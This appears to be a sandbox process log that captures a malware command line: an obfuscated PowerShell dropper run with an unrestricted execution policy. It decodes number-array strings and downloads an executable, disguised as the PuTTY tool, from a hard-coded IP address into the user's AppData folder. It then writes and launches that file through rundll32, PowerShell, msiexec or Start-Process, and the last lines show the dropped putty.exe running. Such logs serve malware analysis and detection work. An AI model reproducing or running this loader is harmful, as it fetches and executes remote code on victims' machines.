powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function Gcvyz($LaoDpjBOwMlJ, $zoOJbFmnAS){[IO.File]::WriteAllBytes($LaoDpjBOwMlJ, $zoOJbFmnAS)};function btkgiFtctCpa($LaoDpjBOwMlJ){if($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36584,36592,36592))) -eq $True){rundll32.exe $LaoDpjBOwMlJ }elseif($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36596,36599,36533))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $LaoDpjBOwMlJ}elseif($LaoDpjBOwMlJ.EndsWith((PRjCphdW @(36530,36593,36599,36589))) -eq $True){misexec /qn /i $LaoDpjBOwMlJ}else{Start-Process $LaoDpjBOwMlJ}};function TpPUOsyQfXJLytyu($SIBwUUTjUY){$YwaYPEKezmd = New-Object (PRjCphdW @(36562,36585,36600,36530,36571,36585,36582,36551,36592,36589,36585,36594,36600));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$zoOJbFmnAS = $YwaYPEKezmd.DownloadData($SIBwUUTjUY);return $zoOJbFmnAS};function PRjCphdW($QSqHdxV){$tebWTojh=36484;$ghByWgz=$Null;foreach($pTBqGIEAUtLRBpLo in $QSqHdxV){$ghByWgz+=[char]($pTBqGIEAUtLRBpLo-$tebWTojh)};return $ghByWgz};function rWxppxCdlo(){$hYcdAQxQdWFnq = $env:AppData + '\';$LsIns = $hYcdAQxQdWFnq + 'putty.exe'; if (Test-Path -Path $LsIns){btkgiFtctCpa $LsIns;}Else{ $KiwTSpCigEdN = TpPUOsyQfXJLytyu (PRjCphdW @(36588,36600,36600,36596,36542,36531,36531,36533,36541,36540,36530,36536,36538,36530,36533,36539,36536,36530,36533,36538,36536,36531,36533,36533,36540,36531,36596,36601,36600,36600,36605,36530,36585,36604,36585));Gcvyz $LsIns $KiwTSpCigEdN;btkgiFtctCpa $LsIns;};;;;}rWxppxCdlo;
2636putty.exe "C:\Users\test22\AppData\Roaming\putty.exe"
2528